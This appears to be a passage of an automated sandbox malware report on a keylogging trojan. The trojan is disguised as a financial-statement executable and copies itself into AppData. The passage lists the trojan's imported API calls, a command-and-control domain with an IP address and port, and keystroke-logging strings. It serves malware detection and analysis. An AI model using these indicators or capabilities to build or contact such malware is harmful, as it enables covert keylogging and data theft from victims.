          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t25_2_00410586
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,25_2_0040728F
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA25_2_0040477E
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,25_2_00403325
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_00412BEE
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha7_2_00403C4A

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: databasepropersonombrecomercialideasearchwords.services
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 190.255.84.57:3521
          Source: Joe Sandbox ViewASN Name: COLOMBIATELECOMUNICACIONESSAESPCO COLOMBIATELECOMUNICACIONESSAESPCO
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403473 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,recv,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,7_2_00403473
          Source: unknownDNS traffic detected: queries for: databasepropersonombrecomercialideasearchwords.services
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.743843983.0000000005530000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Contains functionality to capture and log keystrokesShow sources
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [Esc] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [Enter] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [Tab] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [Down] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [Right] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [Up] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [Left] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [End] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [F2] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [F1] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [Del] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: [Del] 7_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [Esc] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [Enter] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [Tab] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [Down] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [Right] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [Up] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [Left] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [End] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [F2] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [F1] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [Del] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: [Del] 25_2_00405EB2
